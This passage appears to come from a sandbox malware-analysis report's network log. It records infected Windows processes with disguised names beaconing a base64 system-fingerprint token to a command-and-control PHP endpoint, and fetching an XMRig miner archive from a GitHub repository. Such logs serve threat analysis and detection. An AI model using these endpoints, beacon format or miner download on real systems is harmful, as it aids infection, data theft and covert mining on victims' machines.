    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FvNDiZ1vd2eCtBAYFIvQDBI86f2HwM6tqWmueRT3X95Bh5jtxhpWKAN%2BtBK6wUTh8nB6E3PTxdJ9VdqJqqF3kQZSMZjOMZpfp3LNDXSP5a%2B05sERRzpAf2%2FERc8tALvW%2FBFCfhkhYd5%2F"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9ae53f6b438a-EWR
2024-09-27 15:42:41 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49820 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:42 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:42 UTC | 628 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:42 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rwmGLfL5H4CZisiQDfsQyYy7jFu3lcxvh%2FAlBzI0hWg5zKF%2B%2BFmTgI2X33rchV66f%2FjMVqougX3S6O5iAshQ3cTOevXDVp7tJEHtZ6dkVJpUlYnh0HlxwEhAHWJV%2FuXW%2BLOpNwPxIEgF"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9ae9bfb34367-EWR
2024-09-27 15:42:42 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49822 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:43 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:43 UTC | 622 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:43 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OpMtHz3BzpIA94tN0nHuXOmeC1o%2FxTB97tGhNCOdxN8h6MijAg22btv1nMFQwvak98fNq8oefHO%2Bch1upXWLnKAM05QReNqwvytTaJRt0ywkS1zwiHp1AmmhmxHqc%2B6oYChFxlZSzsdu"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9af229827ca5-EWR
2024-09-27 15:42:43 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:43 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 49825 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:45 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:45 UTC | 660 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:45 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9gPnFKHb0kc3kcQ%2BSIzX87i9Q1%2FWEC4HfkmpWDGG5e%2Bd7FmatZvJWh%2Fj0TmFCOZSJ8Oq9%2BC0bCRdMkoUFG8bCj88Fkmzmj3Ay75OlDskcbRA56p33cnZ7Q0DDAR%2FBFErkzTt2mm%2FNwNk"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9afe3cdb8c41-EWR
    alt-svc: h3=":443"; ma=86400
2024-09-27 15:42:45 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 49828 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:47 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:47 UTC | 624 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:47 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aU9kUXq9182bZVbSoHY3R3dEKmJpdOjk5EtePBH2NJJwbl51voM2nvlP2AdBTtnY2TsI0j2sA9BV%2FioLeMsYGqXEbN%2FyPNEtg%2BJrtE6nu%2F3JSMnowtsYr5SqoG6S0aWHccXrJoZggdzq"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9b0a78c7c42c-EWR
2024-09-27 15:42:47 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 49830 | 140.82.121.3 | 443 | 6772 | C:\Users\user\AppData\Local\Temp\svchost64.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:49 UTC | 132 | OUT | GET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1
    Host: github.com
    Connection: Keep-Alive
2024-09-27 15:42:50 UTC | 583 | IN | HTTP/1.1 302 Found
    Server: GitHub.com
    Date: Fri, 27 Sep 2024 15:42:49 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Access-Control-Allow-Origin:
    Location: https://raw.githubusercontent.com/UnamSanctam/SilentXMRMiner/master/SilentXMRMiner/Resources/xmrig.zip
    Cache-Control: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: no-referrer-when-downgrade
2024-09-27 15:42:50 UTC | 3382 | IN | Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49832 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:49 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:50 UTC | 626 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:50 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sOVZr3K5g%2FTW0CHDMIJ%2BRlIsuOUHWukmop%2F1K5bhh8%2BEriNNb1p30yj2vNQlm2z3TrPPmNZ8uHKehxVIhBUeOFB3QpsyZYOFwtCYlW8vGCyY5C2Nj4%2BSJvXb72wdS3jgPFXEf3pr8eQ8"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9b1abae3438e-EWR
2024-09-27 15:42:50 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49833 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:50 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:50 UTC | 628 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:50 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LJushxEXoyRiaOT%2ByPdn7kjyDh78jFXOlqXnrjJr2OLhJ1bud2jpoqI%2FxcX1djP98ikIyPH%2BWMkWC%2BGnFFDPqNAw0jXt1%2BanSGyDc5R0q5mPUn7L5UnGKYZFN3yW4jX%2BXFDPGwAGuM2D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9b1b9f4a558a-EWR
2024-09-27 15:42:50 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49836 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:52 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:52 UTC | 628 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:52 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5t%2FQLr1ifnyHoKvcfpNF7m8GeuNWrIH%2By9bsGR9FOQquzeRHEqCa%2BXbUZ1XMALg0vu36hzHQdjTOybDePOcqC2p7Rbi6JpJka2%2FW30eKYbyInLgOqhNof5SqfIlaAjtsmFhHVI%2B%2FgCba"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9b280f4a5e80-EWR
2024-09-27 15:42:52 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49838 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:53 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:53 UTC | 628 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:53 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OISfcW%2BxfPGxO0pK7LckH5Tp3%2Bw4Eb%2Bs%2Fcth36PsqtS0xeyufX4GdlqYanzyIErYpxlKkVTsjQhDzzcKfQcpd%2BE714gbo%2B31kKkruxxorlF6pPEjwy1UqDh83Kjuu00o3G2EwDoW8sFL"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9b2ffaf7c3f8-EWR
2024-09-27 15:42:53 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49840 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:54 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:54 UTC | 622 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:54 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BsKL190etyJ3WuMguAb%2Fnr3NqCULJceT6hMlRaMu0LBzQ14iiJCIvuNY80BSznFnkSqS6o8s%2Bkg5GM0zQeLjffpOKS5UwQMbCmd0TjiLZcQy5X1aZwNZ8ikndm6j5zL922mLdhzMqOTk"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9b383d644361-EWR
2024-09-27 15:42:54 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 49843 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:55 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:56 UTC | 626 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:56 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d4EBqw6tLF7hSQKYgVPSfPhyb%2BxlVilm9dvHzzKxya80oBWuThHHouz9CWlFlcVzGiEr3GpdCBUNl9shZ9D%2BuOYmpZIFUa0t%2F3BbgfIeN7F0AcP7B%2FdaZK%2BnHK9vvN6hLPpQk1YCcRrQ"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9b3e48c27cf9-EWR
2024-09-27 15:42:56 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 49842 | 140.82.121.3 | 443 | 7732 | C:\Users\user\AppData\Local\Temp\svchost64.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:55 UTC | 132 | OUT | GET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1
    Host: github.com
    Connection: Keep-Alive
2024-09-27 15:42:55 UTC | 583 | IN | HTTP/1.1 302 Found
    Server: GitHub.com
    Date: Fri, 27 Sep 2024 15:42:49 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Access-Control-Allow-Origin:
    Location: https://raw.githubusercontent.com/UnamSanctam/SilentXMRMiner/master/SilentXMRMiner/Resources/xmrig.zip
    Cache-Control: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: no-referrer-when-downgrade
